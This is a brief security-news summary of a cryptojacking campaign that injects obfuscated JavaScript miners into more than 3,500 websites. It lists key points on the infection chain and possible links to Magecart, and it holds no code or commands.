Cybersecurity experts have uncovered a sophisticated campaign that has infected over 3,500 websites with stealthy JavaScript miners, signaling a resurgence of crypto-jacking tactics from 2017. This new approach uses advanced obfuscation and low-resource execution to evade detection while continuously mining cryptocurrency. #Coinhive #Magecart
Keypoints
- The campaign involves compromised websites embedding malicious JavaScript to enable covert cryptocurrency mining.
- Attackers utilize obfuscated code and Web Workers to run mining operations with minimal impact on device performance.
- The infection chain includes injection of base64-encoded scripts that load additional malicious payloads from suspicious domains.
- Methods such as WebSocket communication with C2 servers enable persistent and stealthy mining activities.
- The campaign’s infrastructure reuse hints at broader threat actor links to prior Magecart operations and other cyber threats.
Read More: https://gbhackers.com/new-surge-of-crypto-jacking/